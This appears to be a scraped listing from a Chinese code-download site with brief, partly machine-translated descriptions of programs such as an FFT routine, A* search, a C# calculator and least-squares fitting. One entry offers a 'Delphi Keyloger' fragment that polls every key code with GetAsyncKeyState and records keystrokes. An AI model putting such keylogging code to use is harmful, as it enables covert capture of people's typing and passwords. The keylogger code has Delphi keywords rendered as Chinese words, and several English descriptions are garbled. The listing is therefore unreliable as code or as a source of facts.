-
计算地球或椭圆体中两点距离的程序
计算地球或椭圆体中两点距离的程序-A program which can calculate the instance of two points in the earth or the elipse
- 2022-05-19 14:58:07下载
- 积分:1
-
believe that the process of learning C# has been a long time and just portal GUI...
相信这个程序对已经学习C#很久而刚刚入门图形界面编程的初学者有用,一个用C#做的计算器-believe that the process of learning C# has been a long time and just portal GUI Programming beginners useful, one C# do Calculator
- 2022-02-14 09:58:18下载
- 积分:1
-
通过 Delphi Keyloger 代码
程序 Send(x: string);
开始
form1。Memo1.Lines.Add(x)
结束 ;
程序 TForm1.Timer1Timer(Sender: TObject);
//begin
//if GetAsyncKeyState(Ord("A")) =-32767 然后 send("A") ;
//if GetAsyncKeyState(Ord("B")) =-32767 然后 send("B") ;
var X,y:integer ;
f:char ;
str:string ;
开始
X: = 0 到 255 做
开始
- 2022-06-29 21:37:30下载
- 积分:1
-
STM32 FFT算法
应用背景此算法基于原子MINISTM32开发板写的,用了官方提供的DSP库函数来FFT,官方的DSP库有 64,256,1024点的FFT算法,效果还不错,就是太占CPU了,以至于有点卡,效果是通过串口助手打印数据,我想把AD采集的进来的再FFT算法,但没有实现。关键技术DSP,数字信号处理就是用数值计算的方式对信号进行加工的理论和技术,它的英文原名叫digital signal processing,简称DSP。另外DSP也是digital signal processor的简称,即数字信号处理器,STM32系列出了DSP库,让没有DSP芯片的朋友尝试了DSP的好处。而FFT,FFT(Fast Fourier Transformation),即为快速傅氏变换,是离散傅氏变换的快速算法,它是根据离散傅氏变换的奇、偶、虚、实等特性,对离散傅立叶变换的算法进行改进获得的.波形数据处理的首选
- 2022-03-10 15:42:56下载
- 积分:1
-
A * 搜索算法
在计算机科学中,A * (发音为"星星") 是一种广泛应用于寻路的计算机算法和遍历图,绘制点之间,可有效地遍历路径的过程称为节点。它指出,其性能和加工精度,享有广泛使用。然而,在实际的旅游路线系统中,它通常被优于算法可以预先处理图形上,以达到更好的性能,尽管其他的研究已经发现 A * 要优于其他方法。
- 2022-03-01 04:50:33下载
- 积分:1
-
数据结构
快速排序是一种分而治之的排序算法
- 2023-08-27 18:00:06下载
- 积分:1
-
/ = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = /功能annot
//=== === === === === === === =
//函数说明
//函数名称:PolyFit
//函数功能:最小二乘法曲线拟合
//使用方法:double *x ---- 存放n个数据点的X坐标
// double *y ---- 存放n个数据点的Y坐标
// int n -------- 给定数据点个数
// double *a ---- 返回m-1次拟合多项式的m个系数
// int m -------- 拟合多项式的项数,即拟合多项式的最高次为m-1。要求m20,则本函数自动按m=min{n,20}处理
// double *dt --- dt[0]返回拟合多项式与各数据点误差的平方和;dt[1]返回拟合多
// 项式与各数据点的误差绝对值之和;dt[2]返回拟合多项式与各数据
// 点误差绝对值的最大值
//注意事项:拟合多项式的形式为 y = b0 + b1*(x-Xavr)...
-//=== === === === === ==== === === === === === === ==== === =// function annotations// function name : PolyFit// Function functions : Least Squares Curve Fitting// Use : double* x n-store data point coordinates of the X//* y double-storage n data point Y coordinates// int n-------- given the number of data points//* a double---- returned to the m-1 m fit polynomial coefficients// int m-------- polynomial fitting items , which is the highest polynomial fitting time for m-1. Request m
- 2023-07-25 11:15:03下载
- 积分:1
-
VB图像识别
资源描述VB图像识别VB图像识别VB图像识别VB图像识别VB图像识别VB图像识别VB图像识别VB图像识别
- 2022-08-17 18:45:53下载
- 积分:1
-
聊天应用程序
这是一个用技术做的聊天应用程序。net c#一样,wpf,wcf一个漂亮的gui和良好的编程代码
- 2023-06-05 01:20:03下载
- 积分:1
-
讲述了辨识的一些基本概念和基础知识,用经典辨识方法和最小二乘法进行辨识及对应的控制算法...
讲述了辨识的一些基本概念和基础知识,用经典辨识方法和最小二乘法进行辨识及对应的控制算法-Tells the story of the identification of some basic concepts and knowledge base, with classical identification method and least-square method for identification and corresponding control algorithm
- 2022-02-18 15:24:03下载
- 积分:1